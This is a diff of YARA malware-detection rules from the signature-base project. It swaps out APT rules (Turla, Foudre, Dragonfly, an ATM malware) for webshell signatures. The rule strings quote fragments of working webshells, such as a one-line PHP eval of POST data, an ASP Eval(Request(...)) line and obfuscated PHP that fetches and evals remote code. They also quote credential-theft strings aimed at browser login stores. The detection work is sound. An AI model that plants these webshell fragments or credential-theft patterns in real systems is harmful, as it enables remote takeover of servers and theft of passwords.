+		$s4 = "\">www.Expdoor.com</a>" fullword
+		$s5 = "    <input name=\"FileName\" type=\"text\" value=\"Asp_ver.Asp\" size=\"20\" max"
+		$s10 = "set file=fs.OpenTextFile(server.MapPath(FileName),8,True)  '" fullword
+		$s14 = "set fs=server.CreateObject(\"Scripting.FileSystemObject\")   '" fullword
+		$s16 = "<TITLE>Expdoor.com ASP" fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $code1 or $code2 ) or ( $code3 and $code4 ) )
+		2 of them
 }
-rule SIGNATURE_BASE_Waterbug_Turla_Dropper
+rule SIGNATURE_BASE_Webshell_Webshells_New_Php2
 {
 	meta:
-		description = "Symantec Waterbug Attack - Trojan Turla Dropper"
-		author = "Symantec Security Response"
-		id = "f9683ac7-36f3-5a2a-8b76-e8e2527f4e0d"
-		date = "2015-01-22"
-		modified = "2023-12-05"
-		reference = "http://t.co/rF35OaAXrl"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_waterbug.yar#L50-L62"
+		description = "Web shells - generated from file php2.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3284-L3297"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6836b8d28fb41d9459f24d22e3c428b022b26885b7dce1caa5b0d5a7a1b7f82b"
-		score = 75
+		hash = "fbf2e76e6f897f6f42b896c855069276"
+		logic_hash = "0350df076a25af77fbd8d5db2b38438a10cd5b9237b23b2f64c6360607b41982"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = {0F 31 14 31 20 31 3C 31 85 31 8C 31 A8 31 B1 31 D1 31 8B 32 91 32 B6 32 C4 32 6C 33 AC 33 10 34}
-		$b = {48 41 4C 2E 64 6C 6C 00 6E 74 64 6C 6C 00 00 00 57 8B F9 8B 0D ?? ?? ?? ?? ?? C9 75 26 56 0F 20 C6 8B C6 25 FF FF FE FF 0F 22 C0 E8}
+		$s0 = "<?php $s=@$_GET[2];if(md5($s.$s)=="
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Waterbug_Fa_Malware : FILE
+rule SIGNATURE_BASE_Webshell_Bypass_Iisuser_P
 {
 	meta:
-		description = "Symantec Waterbug Attack - FA malware variant"
-		author = "Symantec Security Response"
-		id = "b09f798a-2875-59ca-b880-971d8f973c76"
-		date = "2015-01-22"
-		modified = "2023-01-27"
-		reference = "http://t.co/rF35OaAXrl"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_waterbug.yar#L64-L81"
+		description = "Web shells - generated from file bypass-iisuser-p.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3298-L3311"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b3ac0d69551f27c7f81e24eb00e110639d4b31c8581dfee82715d65528b09632"
-		score = 75
+		hash = "924d294400a64fa888a79316fb3ccd90"
+		logic_hash = "60d0609291e5def26ce949c903ac767db4157b4f9cf4eee315c69ee7a8d8e77b"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$string1 = "C:\\proj\\drivers\\fa _ 2009\\objfre\\i386\\atmarpd.pdb"
-		$string2 = "d:\\proj\\cn\\fa64\\"
-		$string3 = "sengoku_Win32.sys\x00"
-		$string4 = "rk_ntsystem.c"
-		$string5 = "\\uroboros\\"
-		$string6 = "shell.{F21EDC09-85D3-4eb9-915F-1AFA2FF28153}"
+		$s0 = "<%Eval(Request(chr(112))):Set fso=CreateObject"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( any of ( $string* ) )
+		all of them
 }
-rule SIGNATURE_BASE_Waterbug_Sav : FILE
-{
-	meta:
-		description = "Symantec Waterbug Attack - SAV Malware"
-		author = "Symantec Security Response"
-		id = "685849de-9892-56bf-8215-21b08d8b2d7c"
-		date = "2015-01-22"
-		modified = "2023-01-27"
-		reference = "http://t.co/rF35OaAXrl"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_waterbug.yar#L114-L129"
+rule SIGNATURE_BASE_Webshell_Sig_404Super
+{
+	meta:
+		description = "Web shells - generated from file 404super.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3312-L3330"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c8622ac6cb1f0b9965fe6ee1a4860f19d8b0dc1c586e2a3771420b8d78648066"
-		score = 75
+		hash = "7ed63176226f83d36dce47ce82507b28"
+		logic_hash = "01ecffc6bca2acf1ea4f4d965f3513f7b08ee3d5abbda29d53081f2931ecf9e9"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$code1a = { 8B 75 18 31 34 81 40 3B C2 72 F5 33 F6 39 7D 14 76 1B 8A 04 0E 88 04 0F 6A 0F 33 D2 8B C7 5B F7 F3 85 D2 75 01 }
-		$code1b = { 8B 45 F8 40 89 45 F8 8B 45 10 C1 E8 02 39 45 F8 73 17 8B 45 F8 8B 4D F4 8B 04 81 33 45 20 8B 4D F8 8B 55 F4 89 04 8A EB D7 83 65 F8 00 83 65 EC 00 EB 0E 8B 45 F8 40 89 45 F8 8B 45 EC 40 89 45 EC 8B 45 EC	3B 45 10 73 27 8B 45 F4 03 45 F8 8B 4D F4 03 4D EC 8A 09 88 08 8B 45 F8 33 D2 6A 0F 59 F7 F1 85 D2 75 07 }
-		$code1c = { 8A 04 0F 88 04 0E 6A 0F 33 D2 8B C6 5B F7 F3 85 D2 75 01 47 8B 45 14 46 47 3B F8 72 E3 EB 04 C6 04 08 00 48 3B C6 73 F7 33 C0 C1 EE 02 74 0B 8B 55 18 31 14 81 40 3B C6 72 F5 }
-		$code2 = { 29 5D 0C 8B D1 C1 EA 05 2B CA 8B 55 F4 2B C3 3D 00 00 00 01 89 0F 8B 4D 10 8D 94 91 00 03 00 00 73 17 8B 7D F8 8B 4D 0C 0F B6 3F C1 E1 08 0B CF C1 E0 08 FF 45 F8 89 4D 0C 8B 0A 8B F8 C1 EF 0B}
+		$s4 = "$i = pack('c*', 0x70, 0x61, 99, 107);" fullword
+		$s6 = "    'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631')," fullword
+		$s7 = "//http://require.duapp.com/session.php" fullword
+		$s8 = "if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}" fullword
+		$s12 = "//define('pass','123456');" fullword
+		$s13 = "$GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $code1a or $code1b or $code1c ) and $code2 )
+		1 of them
 }
-rule SIGNATURE_BASE_Foudre_Backdoor_1 : FILE
+rule SIGNATURE_BASE_Webshell_Webshells_New_JSP
 {
 	meta:
-		description = "Detects Foudre Backdoor"
+		description = "Web shells - generated from file JSP.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ab2d43f4-fc35-5980-9b5d-98c5c4cfd012"
-		date = "2017-08-01"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/Nbqbt6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_foudre.yar#L13-L29"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3331-L3346"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e42959162017ddf6da1d0b2950096e93e0e98c3e5f88ae28fc48e82ef98ca87b"
-		score = 75
+		hash = "495f1a0a4c82f986f4bdf51ae1898ee7"
+		logic_hash = "bcb2f5d16ff3cc1454bf4653defe037e02a9228a5b7cf7428b1a577f4207c3c8"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7e73a727dc8f3c48e58468c3fd0a193a027d085f25fa274a6e187cf503f01f74"
-		hash2 = "7ce2c5111e3560aa6036f98b48ceafe83aa1ac3d3b33392835316c859970f8bc"
 
 	strings:
-		$s1 = "initialization failed: Reinstall the program" fullword wide
-		$s2 = "SnailDriver V1" fullword wide
-		$s3 = "lp.ini" fullword wide
+		$s1 = "void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"
+		$s5 = "bw.write(z2);bw.close();sb.append(\"1\");}else if(Z.equals(\"E\")){EE(z1);sb.app"
+		$s11 = "if(Z.equals(\"A\")){String s=new File(application.getRealPath(request.getRequest"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Foudre_Backdoor_Dropper_1 : FILE
+rule SIGNATURE_BASE_Webshell_Webshell_123
 {
 	meta:
-		description = "Detects Foudre Backdoor"
+		description = "Web shells - generated from file webshell-123.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "38c7d05b-d545-53c5-8db7-a7925b5b7838"
-		date = "2017-08-01"
-		modified = "2023-01-07"
-		reference = "https://goo.gl/Nbqbt6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_foudre.yar#L31-L51"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2023-01-27"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3347-L3364"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "77ae856e74ceb04e73c26154d7b4cf98ed0e1d8b9ac6ed78775becbff2473e13"
-		score = 75
+		hash = "2782bb170acaed3829ea9a04f0ac7218"
+		logic_hash = "1caccadf2bd7d265f9b5026c82acc31ade95313d57382651004db8b5e361312d"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "6bc9f6ac2f6688ed63baa29913eaf8c64738cf19933d974d25a0c26b7d01b9ac"
-		hash2 = "da228831089c56743d1fbc8ef156c672017cdf46a322d847a270b9907def53a5"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "536F594A96C5496CB3949A4DA4775B576E049C57696E646F77735C43757272656E7456657273696F6E5C5C52756E" fullword wide
-		$x2 = "2220263024C380B3278695851482EC32" fullword wide
-		$s1 = "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\\\Startup\\" wide
-		$s2 = "C:\\Documents and Settings\\All Users\\" wide
-		$s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\\\Shell Folders" wide
-		$s4 = "ShellExecuteW" fullword wide
+		$s0 = "// Web Shell!!" fullword
+		$s1 = "@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6"
+		$s3 = "$default_charset = \"UTF-8\";" fullword
+		$s4 = "// url:http://www.weigongkai.com/shell/"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 4 of them ) )
+		2 of them
 }
-
-rule SIGNATURE_BASE_Foudre_Backdoor_Component_1 : FILE
+rule SIGNATURE_BASE_Webshell_Dev_Core
 {
 	meta:
-		description = "Detects Foudre Backdoor"
+		description = "Web shells - generated from file dev_core.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9070f581-64a7-5620-aff4-7f2cbd73099d"
-		date = "2017-08-01"
-		modified = "2023-01-07"
-		reference = "https://goo.gl/Nbqbt6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_foudre.yar#L53-L75"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3365-L3383"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2eb267ab93c297101aef0cfcca78d0299ca7baa96b983a5f2ff547394cbac82d"
-		score = 75
+		hash = "55ad9309b006884f660c41e53150fc2e"
+		logic_hash = "b3c7a9bdaa7e5bf76df9ffba94157777c32199edeaa1c8745e9400d138abc267"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7c6206eaf0c5c9c6c8d8586a626b49575942572c51458575e51cba72ba2096a4"
-		hash2 = "db605d501d3a5ca2b0e3d8296d552fbbf048ee831be21efca407c45bf794b109"
 
 	strings:
-		$s1 = { 50 72 6F 6A 65 63 74 31 2E 64 6C 6C 00 44 31 }
-		$s2 = "winmgmts:\\\\localhost\\root\\SecurityCenter2" fullword wide
-		$s3 = "C:\\Documents and Settings\\All Users\\" wide
+		$s1 = "if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {" fullword
+		$s9 = "setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);" fullword
+		$s10 = "$_SESSION['code'] = _REQUEST(sprintf(\"%s?%s\",pack(\"H*\",'6874"
+		$s11 = "if (preg_match(\"/^HTTP\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))"
+		$s12 = "eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C"
+		$s15 = "if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 3 of them ) or ( 2 of them and pe.exports ( "D1" ) ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Foudre_Backdoor_SFX : FILE
+rule SIGNATURE_BASE_Webshell_Webshells_New_Php
 {
 	meta:
-		description = "Detects Foudre Backdoor SFX"
+		description = "Web shells - generated from file pHp.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b5c7cd6b-48c8-5703-b695-19d226de1810"
-		date = "2017-08-01"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/Nbqbt6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_foudre.yar#L77-L93"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3384-L3401"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dd5492f5314cb87fdb7c8b29bdf31e1fcd8541ed47b20f309538437d9c6ac600"
-		score = 75
+		hash = "b0e842bdf83396c3ef8c71ff94e64167"
+		logic_hash = "a943f3b0d1d56194e250c7cf3e05b2bfec7b29f91ef56085d645efa3fe8995c9"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2b37ce9e31625d8b9e51b88418d4bf38ed28c77d98ca59a09daab01be36d405a"
-		hash2 = "4d51a0ea4ecc62456295873ff135e4d94d5899c4de749621bafcedbf4417c472"
 
 	strings:
-		$s1 = "main.exe" fullword ascii
-		$s2 = "pub.key" fullword ascii
-		$s3 = "WinRAR self-extracting archive" fullword wide
+		$s0 = "if(is_readable($path)) antivirus($path.'/',$exs,$matches);" fullword
+		$s1 = "'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr"
+		$s13 = "'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*"
+		$s14 = "'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+"
+		$s19 = "'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_once"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_ATM_Malware_Loup_1 : FILE
+rule SIGNATURE_BASE_Webshell_Webshells_New_Pppp
 {
 	meta:
-		description = "Detects ATM Malware Loup"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "2215a93f-d854-5f9b-b5cd-53962c45db08"
-		date = "2020-08-17"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/r3c0nst/status/1295275546780327936"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_atm_loup.yar#L3-L19"
+		description = "Web shells - generated from file pppp.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3402-L3417"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6c9e9f78963ab3e7acb43826906af22571250dc025f9e7116e0201b805dc1196"
-		logic_hash = "5068c3f27cf821f512fb9a473d2bd45066d550f30fbc26f0cbebbe103e6f4ccb"
-		score = 75
+		hash = "cf01cb6e09ee594545693c5d327bdd50"
+		logic_hash = "bd09fc2ec88bea83b16e63afafa3d5f74f119a81046a663322f5b396b48da135"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$String1 = "C:\\Users\\muham\\source\\repos\\loup\\Debug\\loup.pdb" ascii
-		$String2 = "CurrencyDispenser1" ascii
-		$Code = {50 68 C0 D4 01 00 8D 4D E8 51 68 2E 01 00 00 0F B7 55 08 52 E8}
+		$s0 = "Mail: chinese@hackermail.com" fullword
+		$s3 = "if($_GET[\"hackers\"]==\"2b\"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "
+		$s6 = "Site: http://blog.weili.me" fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 100KB and all of ( $String* ) and $Code
+		1 of them
 }
-
-rule SIGNATURE_BASE_Unspecified_Malware_Sep1_A1 : FILE
+rule SIGNATURE_BASE_Webshell_Webshells_New_Code
 {
 	meta:
-		description = "Detects malware from DrqgonFly APT report"
+		description = "Web shells - generated from file code.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cff49e85-c8c3-5240-9948-0551e38e7040"
-		date = "2017-09-12"
-		modified = "2023-12-05"
-		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dragonfly.yar#L13-L27"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3418-L3435"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d235dc964ac74d2b635251d07b2a9119b731a6c3c45b6b2a81ca88e6fc8b63b7"
-		score = 75
+		hash = "a444014c134ff24c0be5a05c02b81a79"
+		logic_hash = "5ae053a9afc1f720c56304c434cd89861e1df4060b7d813921e7f85978227020"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0"
+
+	strings:
+		$s1 = "<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi"
+		$s7 = "$file = !empty($_POST[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_PO"
+		$s10 = "if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_"
+		$s14 = "Processed in <span id=\"runtime\"></span> second(s) {gzip} usage:"
+		$s17 = "<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and pe.imphash ( ) == "17a4bd9c95f2898add97f309fc6f9bcd" )
+		1 of them
 }
-rule SIGNATURE_BASE_Dragonfly_APT_Sep17_1 : FILE
+rule SIGNATURE_BASE_Webshell_Webshells_New_Jspyyy
 {
 	meta:
-		description = "Detects malware from DrqgonFly APT report"
+		description = "Web shells - generated from file jspyyy.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d219a54e-cb76-5c56-b64c-5019e811eeb1"
-		date = "2017-09-12"
-		modified = "2023-12-05"
-		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dragonfly.yar#L29-L44"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3436-L3449"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c885fb690b7e047203529f0c4a6dd60dea822ce60a47e42b52d3216bc26da62e"
-		score = 75
+		hash = "b291bf3ccc9dac8b5c7e1739b8fa742e"
+		logic_hash = "0afe45556aa7b562672cc4b609cf001aaa617b03028322abac6524f666b069e1"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fc54d8afd2ce5cb6cc53c46783bf91d0dd19de604308d536827320826bc36ed9"
 
 	strings:
-		$s1 = "\\Update\\Temp\\ufiles.txt" wide
-		$s2 = "%02d.%02d.%04d %02d:%02d" fullword wide
-		$s3 = "*pass*.*" fullword wide
+		$s0 = "<%@page import=\"java.io.*\"%><%if(request.getParameter(\"f\")"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Dragonfly_APT_Sep17_2 : FILE
+rule SIGNATURE_BASE_Webshell_Webshells_New_Xxxx
 {
 	meta:
-		description = "Detects malware from DrqgonFly APT report"
+		description = "Web shells - generated from file xxxx.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e64f121d-a628-54b5-88f3-96eea388c155"
-		date = "2017-09-12"
-		modified = "2023-01-06"
-		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dragonfly.yar#L46-L66"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3450-L3463"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "433711dd15c8d1044b381046747194e47402288df06da6bbc61055dc9c90f52a"
-		score = 75
+		hash = "5bcba70b2137375225d8eedcde2c0ebb"
+		logic_hash = "e14cc1eaf357389ca58193c77ce2f54774aebb42be9df15f12415df356c7ed42"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "178348c14324bc0a3e57559a01a6ae6aa0cb4013aabbe324b51f906dcf5d537e"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data" wide
-		$s2 = "C:\\Users\\Public\\Log.txt" fullword wide
-		$s3 = "SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins" fullword wide
-		$s4 = "***************** Mozilla Firefox ****************" fullword wide
-		$s5 = "********************** Opera *********************" fullword wide
-		$s6 = "\\AppData\\Local\\Microsoft\\Credentials\\" wide
-		$s7 = "\\Appdata\\Local\\Google\\Chrome\\User Data\\Default\\" wide
-		$s8 = "**************** Internet Explorer ***************" fullword wide
+		$s0 = "<?php eval($_POST[1]);?>  " fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and 3 of them )
+		all of them
 }
-
-rule SIGNATURE_BASE_Dragonfly_APT_Sep17_3 : FILE
+rule SIGNATURE_BASE_Webshell_Webshells_New_Jjjsp3
 {
 	meta:
-		description = "Detects malware from DrqgonFly APT report"
+		description = "Web shells - generated from file JJjsp3.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4eafd732-80bc-5f50-bf0d-096df4d35d61"
-		date = "2017-09-12"
-		modified = "2023-12-05"
-		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dragonfly.yar#L68-L89"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3464-L3477"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f564685eb1426d1a3eb888a888bfdf3a8fa9bc96af07fb0bc5f10c0a324f1d9d"
-		score = 75
+		hash = "949ffee1e07a1269df7c69b9722d293e"
+		logic_hash = "44889540effa2f71889e7f6d0c5d12486e256d83b9230c4902d56f6a59b7939b"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b051a5997267a5d7fa8316005124f3506574807ab2b25b037086e2e971564291"
 
 	strings:
-		$s1 = "kernel64.dll" fullword ascii
-		$s2 = "ws2_32.dQH" fullword ascii
-		$s3 = "HGFEDCBADCBA" fullword ascii
-		$s4 = "AWAVAUATWVSU" fullword ascii
+		$s0 = "<%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!S"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 40KB and ( pe.imphash ( ) == "6f03fb864ff388bac8680ac5303584be" or all of them ) )
+		all of them
 }
-rule SIGNATURE_BASE_Dragonfly_APT_Sep17_4 : FILE
+rule SIGNATURE_BASE_Webshell_Webshells_New_PHP1
 {
 	meta:
-		description = "Detects malware from DrqgonFly APT report"
+		description = "Web shells - generated from file PHP1.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dbc0eebf-fc81-5a0b-b2e0-129d0b40b6f7"
-		date = "2017-09-12"
-		modified = "2023-12-05"
-		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dragonfly.yar#L91-L109"
